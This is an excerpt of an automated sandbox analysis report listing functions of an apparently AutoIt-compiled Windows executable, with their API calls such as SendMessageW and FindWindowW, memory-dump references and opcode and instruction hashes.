                                                                                                                            • Opcode Fuzzy Hash: 6ab628e9b643b7f337e7eb9a1eb164a667740d16f62f34970bb7649561c47b18
                                                                                                                            • Instruction Fuzzy Hash: 9011A934144751AAF621DF108D86FB77794FB50B01F50480FF9866B2C0D6F4B848C766
                                                                                                                            Function 004695F7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,00000000), ref: 00469660
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                            • Opcode ID: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                            • Instruction ID: 486d2595d5a7427da4a9c048e684990a8dc9cac685a8154682435d05c4426571
                                                                                                                            • Opcode Fuzzy Hash: 9c387d355752c609e3ec3b71bdfa1ce54c6356e755a59a855018ee08606d8eab
                                                                                                                            • Instruction Fuzzy Hash: A101D87274121027C600BA259C01AEBB39CEB96354F04443BF94597291EA6DED0E43AA
                                                                                                                            Function 0046956F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 53windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                            • SendMessageW.USER32(00000182,00000182,?,00000000), ref: 004695D6
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend_wcslen
                                                                                                                            • String ID: ComboBox$ListBox
                                                                                                                            • API String ID: 455545452-1403004172
                                                                                                                            • Opcode ID: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                            • Instruction ID: 72d13aeac174e9c1a3a177398698555a642000804846b33da1492f44d6438514
                                                                                                                            • Opcode Fuzzy Hash: ebc0188a5584a95c85a0cdadc4297c14a5cc600b4744d97cee4f9a5f6612b8f9
                                                                                                                            • Instruction Fuzzy Hash: 4D01A77374111067C610BA6A9C01AEB739CABD2364F44443BF94597292EA7DED0E43AA
                                                                                                                            Function 00461774 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: ,$UTF8)
                                                                                                                            • API String ID: 909875538-2632631837
                                                                                                                            • Opcode ID: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                            • Instruction ID: 35c0b5e4e6bd282640ba12729024cfd3588da47ca1ed1c49f01331a057b7ec9b
                                                                                                                            • Opcode Fuzzy Hash: 727c7c5760fb27673dbb24875b26f121239a8201232c39922ad2fa80f7f85d54
                                                                                                                            • Instruction Fuzzy Hash: 7601B575A083805BE720DE20CC85BA773A1AB81319F58492ED8D5872A1F73DD449C75B
                                                                                                                            Function 00461772 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: _strncmp
                                                                                                                            • String ID: ,$UTF8)
                                                                                                                            • API String ID: 909875538-2632631837
                                                                                                                            • Opcode ID: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                            • Instruction ID: b3c6803870d1b21283bf32431af321d4190ac902c568a1d8b2e557ddf245ca97
                                                                                                                            • Opcode Fuzzy Hash: abd9c85c193eb76a615b38e8260140970f327620044c052ec7ea970ca86f7e2a
                                                                                                                            • Instruction Fuzzy Hash: 1E01D875A043805BE720DE20CC85B6773A19B4131AF68492FD8D6872A1F73DD449C75B
                                                                                                                            Function 004560AD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,?), ref: 004560BA
                                                                                                                              • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                            • wsprintfW.USER32 ref: 004560E9
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend_mallocwsprintf
                                                                                                                            • String ID: %d/%02d/%02d
                                                                                                                            • API String ID: 1262938277-328681919
                                                                                                                            • Opcode ID: ae0d00370480c3e25b1e00bef44ab8e9cb382fa1ad95aa9018207b56710a469a
                                                                                                                            • Instruction ID: 2a73c44ac592e0fe880a68d863bd42ca8887a008949f121bccc13d44bcf2ebb3
                                                                                                                            • Opcode Fuzzy Hash: ae0d00370480c3e25b1e00bef44ab8e9cb382fa1ad95aa9018207b56710a469a
                                                                                                                            • Instruction Fuzzy Hash: 13F08272744220A7E2105BA5AC01BBFB3D4EB84762F10443BFE44D12C0E66E8455D7BA
                                                                                                                            Function 00442262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0044226C
                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0044227F
                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                            • Opcode ID: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                            • Instruction ID: f0ed9326d30a696a9ade51716a531e8bd1705000bbe21894ac7a57cb5589152b
                                                                                                                            • Opcode Fuzzy Hash: 62d1e1a02585172d548c808ed695c1d9d3028cc69dace886715b1b3d1423c17e
                                                                                                                            • Instruction Fuzzy Hash: 71D0A772F8130177E92077706D0FFCB26246F14710F010C3AB305AA1C0D4E8D440C358
                                                                                                                            Function 0044222A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00442240
                                                                                                                            • PostMessageW.USER32(00000000), ref: 00442247
                                                                                                                              • Part of subcall function 00436272: Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                            • Opcode ID: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                            • Instruction ID: d1e5b9be119239975405e397b0c0efdc35250005003305bf123d4268f2ecb06f
                                                                                                                            • Opcode Fuzzy Hash: d3682f88803cb2a3efb7847c83fab5a73234bf1983908037f6894d5424c159e3
                                                                                                                            • Instruction Fuzzy Hash: 4DD05E72B813013BE92076706D0FF8B26246B14710F010C2AB205AA1C0D4E8A4408358
                                                                                                                            Function 00439514 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00439522
                                                                                                                              • Part of subcall function 00411A1F: _doexit.LIBCMT ref: 00411A2B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.2204147541.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.2204128342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204205484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204234489.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.2204292729.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BL.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message_doexit
                                                                                                                            • String ID: AutoIt$Error allocating memory.
                                                                                                                            • API String ID: 1993061046-4017498283
                                                                                                                            • Opcode ID: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                            • Instruction ID: 5d68346425d2699d55792fe39b85c2381918ba1f955abba655776c5540820644
                                                                                                                            • Opcode Fuzzy Hash: 98c4a6cf209f69c689245cd57ea7e643062e7ce984d6ae84015e6f4dd77dfbd0
                                                                                                                            • Instruction Fuzzy Hash: 82B092343C038627E20437A01C0BF8C28049B64F42F220C2AB308384D259D90080231E